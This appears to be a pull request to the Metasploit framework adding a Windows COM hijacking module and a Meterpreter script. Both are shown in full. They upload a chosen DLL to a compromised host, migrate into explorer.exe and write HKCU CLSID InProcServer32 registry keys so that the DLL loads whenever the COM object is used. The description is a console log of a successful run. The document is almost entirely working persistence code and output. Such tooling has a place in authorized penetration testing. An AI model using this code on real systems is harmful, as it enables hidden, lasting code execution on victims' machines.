### PR TITLE
comhijack

### DIFF
--- a/modules/exploits/windows/local/comhijack.rb
+++ b/modules/exploits/windows/local/comhijack.rb
@@ -1,0 +1,85 @@
+require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+#  include Exploit::Powershell
+#  include Post::Windows::Priv
+  include Post::Windows::Registry
+  include Post::Windows::Runas
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Windows  COM Hijacking',
+        'Description'   => %q{
+        The Component Object Model (COM) is a Windows feature for providing interoperability
+         between software components through the Operating System itself. In short, COM
+         hijacking techniques attempt to abuse this interoperability by redirecting or
+         hijacking an invoker application in to calling the attacker payload. COM classes
+         can be associated with a handler DLL, which will execute when the invoker application
+         attempts to perform interoperability.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+          'demonsec666', # UAC bypass discovery and research
+          'WBGIII', # MSF module
+        ],
+        'Platform'      => ['win'],
+        'SessionTypes'  => ['meterpreter'],
+        'Targets'       => [
+            [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions'  =>
+  {
+    'DisablePayloadHandler' => true
+  },
+  'References'    => [
+    [
+      'URL', 'https://www.mdsec.co.uk/2019/05/persistence-the-continued-or-prolonged-existence-of-something-part-2-com-hijacking/',
+      'URL', 'https://www.ggsec.cn/comhijack&meterpreter.html'
+    ]
+  ],
+  'DisclosureDate'=> 'Jun 1 2019'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('file_path', [true, 'set  file_path  c:\\\\windows\\\\temp\\\\comhijack.dll'," <windows_path comhijack.dll>"]),
+        OptString.new('upload_file', [true, 'set upload_file  <YOU HACK  DLL_PATH>',"<YOU HACK  DLL_PATH>"])
+      ])
+  end
+
+
+
+  def exploit
+    upload_file= datastore['upload_file']
+    file_name= datastore['file_path']
+    print_status("upload #{upload_file} -> #{file_name}")
+      if upload_file("#{file_name}","#{upload_file}")
+        print_good("success upload #{upload_file} -> #{file_name}")
+      end
+    session.run_cmd("run migrate -n explorer.exe")
+    registry_path="HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}"
+    if registry_createkey(registry_path)
+    	print_good("success created HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}")
+    end
+
+    if registry_createkey(registry_path+"\\InProcServer32")
+    	print_good("success created HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32")
+    end
+
+    if registry_setvaldata(registry_path+"\\InProcServer32","","#{file_name}","REG_SZ")
+    	print_good("success created HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32 default value #{file_name}")
+    end
+
+    if registry_setvaldata(registry_path+"\\InProcServer32","ThreadingModel","Both","REG_SZ")
+    	print_good("success created HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32 ThreadingModel value Both")
+    end
+  end
+end

--- a/modules/exploits/windows/local/comhijack.rb
+++ b/modules/exploits/windows/local/comhijack.rb
@@ -1,9 +1,6 @@
 require 'msf/core/exploit/exe'
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
-
-#  include Exploit::Powershell
-#  include Post::Windows::Priv
   include Post::Windows::Registry
   include Post::Windows::Runas
 

--- a/modules/exploits/windows/local/comhijack.rb
+++ b/modules/exploits/windows/local/comhijack.rb
@@ -1,6 +1,4 @@
 require 'msf/core/exploit/exe'
-require 'msf/core/exploit/powershell'
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 

--- a/scripts/meterpreter/comhijack.rb
+++ b/scripts/meterpreter/comhijack.rb
@@ -1,0 +1,69 @@
+#author ：demonsec666
+#author ：WBGII
+#LINK   : https://www.mdsec.co.uk/2019/05/persistence-the-continued-or-prolonged-existence-of-something-part-2-com-hijacking/
+#VIDEO  : https://youtu.be/xKRDo6Q6r3Y
+require "rexml/document"
+session = client
+@@exec_opts = Rex::Parser::Arguments.new(
+  "-h" => [ false,"Help menu." ],
+  "-u" => [ true, "upload File" ],
+  "-p" => [ true, "upload path"]
+)
+
+
+def usage()
+  print_line  "run comhijack -p c:\\\\windows\\\\temp\\\\comhijack.dll -u <YOU DLL>"
+  print_line(@@exec_opts.usage)
+  raise Rex::Script::Completed
+end
+
+def unsupported
+  print_error("This version of Meterpreter is not supported with this Script!")
+  raise Rex::Script::Completed
+end
+
+unsupported if client.platform != 'windows'
+#parsing of Options
+file_name = nil
+fila_path = nil
+info=client.sys.config.sysinfo
+
+@@exec_opts.parse(args) { |opt, idx, val|
+  case opt
+  when "-p"
+    fila_path = val
+  when "-h"
+  # puts "run  comhijack -p c:/\\windows/\\temp/\\comhijack.dll -u <YOU DLL>"
+  usage
+  raise Rex::Script::Completed
+
+  when "-u"
+    file_name = val
+
+  print_status("upload #{file_name} -> #{fila_path}")
+    if upload_file("#{fila_path}","#{file_name}")
+      print_good("success upload #{file_name} -> #{fila_path}")
+    end
+  end
+}
+
+unless info['Architecture']==session.arch
+    session.run_cmd("run migrate -n explorer.exe")
+end
+
+registry_path="HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}"
+if registry_createkey(registry_path)
+  print_good("success created HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}")
+end
+
+if registry_createkey(registry_path+"\\InProcServer32")
+  print_good("success created HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32")
+end
+
+if registry_setvaldata(registry_path+"\\InProcServer32","","#{fila_path}","REG_SZ")
+  print_good("success created HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32 default value #{fila_path}")
+end
+
+if registry_setvaldata(registry_path+"\\InProcServer32","ThreadingModel","Both","REG_SZ")
+  print_good("success created HKCU\\Software\\Classes\\CLSID\\{0358B920-0AC7-461F-98F4-58E32CD89148}\\InProcServer32 ThreadingModel value Both")
+end


### PR DESCRIPTION
meterpreter > background 
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/comhijack
msf5 exploit(windows/local/comhijack) > set  file_path  c:\\windows\\temp\\comhijack.dll
file_path => c:\windows\temp\comhijack.dll
msf5 exploit(windows/local/comhijack) > set upload_file /Users/demon/Downloads/cmd.dll 
upload_file => /Users/demon/Downloads/cmd.dll
msf5 exploit(windows/local/comhijack) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/comhijack) > run

[*] upload /Users/demon/Downloads/cmd.dll -> c:\windows\temp\comhijack.dll
[+] success upload /Users/demon/Downloads/cmd.dll -> c:\windows\temp\comhijack.dll
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.
[!] Example: run post/windows/manage/migrate OPTION=value [...]
[*] Current server process: rundll32.exe (1032)
[+] Migrating to 3456
[+] Successfully migrated to process 
[+] success created HKCU\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}
[+] success created HKCU\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}\InProcServer32
[+] success created HKCU\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}\InProcServer32 default value c:\windows\temp\comhijack.dll
[+] success created HKCU\Software\Classes\CLSID\{0358B920-0AC7-461F-98F4-58E32CD89148}\InProcServer32 ThreadingModel value Both
msf5 exploit(windows/local/comhijack) > 


![image](https://user-images.githubusercontent.com/24873495/58746363-08d75e80-8490-11e9-9727-f0b3ece9f463.png)
